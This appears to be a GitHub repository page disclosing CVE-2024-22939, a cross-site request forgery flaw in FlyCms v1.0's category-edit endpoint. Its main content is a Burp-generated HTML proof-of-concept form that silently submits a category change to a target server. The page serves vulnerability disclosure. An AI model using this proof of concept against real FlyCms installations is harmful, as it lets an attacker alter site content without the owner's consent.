Skip to content

NUDTTAN91/CVE-2024-22939

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits
 
 
 
 

Repository files navigation

target:https://github.com/sunkaifei/FlyCms version: v1.0

FlyCms v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /system/article/category_edit

image-20240108165756056

Poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.247.192/system/article/category_edit?id=1&name=%E7%A7%BB%E5%8A%A8%E5%BC%80%E5%8F%91123" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



image-20240108165931640

Success:

image-20240108170027562

About

CVE-2024-22939

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published